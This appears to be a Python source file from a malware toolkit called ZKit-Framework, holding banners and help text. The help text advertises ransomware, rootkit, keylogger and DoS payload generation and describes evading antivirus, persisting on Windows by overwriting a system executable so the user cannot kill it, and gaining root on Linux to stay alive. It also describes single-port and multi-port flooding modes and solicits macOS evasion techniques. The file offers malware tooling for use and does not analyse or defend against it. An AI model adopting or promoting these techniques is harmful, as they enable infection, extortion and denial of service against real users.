first = """

                @@@@@@@@                 @@@  @@@                 @@@                 @@@@@@@
                @@@@@@@@                 @@@  @@@                 @@@                 @@@@@@@
                     @@!                 @@!  !@@                 @@!                   @@!
                    !@!                  !@!  @!!                 !@!                   !@!
                    @!!                   @!@@!@!                  !!@                   @!!
                   !!!                    !!@!!!                   !!!                   !!!
                  !!:                     !!: :!!                  !!:                   !!:
                 :!:                      :!:  !:!                 :!:                   :!:
                 :: ::::                  ::  :::                  ::                    ::
                : :: : :                  :   :::                 :                      :
                            {--!Github https://github.com/000Zer000/ZKit-Framework!--}
                                   {--{Rootkit}{KeyLogger}{Dos}{Ransomware}--}
                                        {--!@#$%? Coded By Zer0 ?%$#@!--}
                                           {--!Version        1.3.5!--}
""" 

second = """
      |________________________________________________________________________|
      | (_________Github https://github.com/000Zer000/ZKit-Framework_________) |
      | -::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::- |
      | -ZZZZZZZZZZZZZ:::::::KK:::::::::::KK:::IIIIII::::::TTTTTTTTTTTT::::::- |              
      | -ZZZZZZZZZZZZZ:::::::KK:::::::::KK:::::::II::::::::::::TTTT::::::::::- |
      | -::::::::::ZZ::::::::KK:::::::KK:::::::::II::::::::::::TTTT::::::::::- |
      | -:::::::::ZZ:::::::::KK:::::KK:::::::::::II::::::::::::TTTT::::::::::- |
      | -::::::::ZZ::::::::::KK:::KK:::::::::::::II::::::::::::TTTT::::::::::- |
      | -:::::::ZZ:::::::::::KK:KK:::::::::::::::II::::::::::::TTTT::::::::::- |
      | -::::::ZZ::::::::::::KKKK::::::::::::::::II::::::::::::TTTT::::::::::- |
      | -:::::ZZ:::::::::::::KKKK::::::::::::::::II::::::::::::TTTT:::::::: :- |
      | -::::ZZ::::::::::::::KK:KK:::::::::::::::II::::::::::::TTTT::::::::::- |
      | -:::ZZ:::::::::::::::KK:::KK:::::::::::::II::::::::::::TTTT::::::::::- |
      | -::ZZ::::::::::::::::KK:::::KK:::::::::::II::::::::::::TTTT::::::::::- |
      | -:ZZ:::::::::::::::::KK:::::::KK:::::::::II::::::::::::TTTT::::::::::- |
      | -ZZZZZZZZZZZZZ:::::::KK:::::::::KK:::::::II::::::::::::TTTT::::::::::- |
      | -ZZZZZZZZZZZZZ:::::::KK:::::::::::KK:::IIIIII::::::::::TTTT::::::::::- |
      | (____________________________________________________________________) |
      |________________________________________________________________________| 
      |                        Version        1.3.5                            |
       
"""
helpbanner = """
ZKit-Framework
===============
ZKit is a framework for generating payloads for several platforms . working on Ddos . running brute force attacks . payloads can be ransomware , rootkit
keylogger for windows and linux also raw payloads are available . 

Payloads
==========
Payloads generated by ZKit use several ways to hide their real identity . on every platform that zkit supports . 
there is a specified way to protect it self from AVs . as you know . there is no python in windows for best 
performance use a compiler to compile it to python . but on linux python payloads can be used . if you want a payload for windows without compiling it
you can use raw payloads . they need python installed .

Windows
-------- 
payloads for this platfrom have to get compiled . it overwrites a system file (.exe) so user cant kill it that easy . 
and it will run everytime computer boots.

Linux
------
payloads for linux can be left like what they are . because there is python built-in in linux . after it got in the system .
checks if user is root or can be root (sudo) if yes . tries to keep it self alive.

what about Mac OS ?
====================
Sorry for saying that but there is no way that i know to protect the virus from killing it . or any Mac Os way to hide a virus . 
but you can help this project . with sending me ways to hide a virus from AV on Mac OS . to my email . ZKit-Framework@protonmail.com

Dosing
=======
there are 2 methods available in this version . SS and SM . they have meaning and their meaning is . SS is Single ip , single port .
it attacks to an ip address and one port  from one port and one ip address . but SM is Single ip , multiply ports.
it attacks to one ip from one ip and port to several ports . 
"""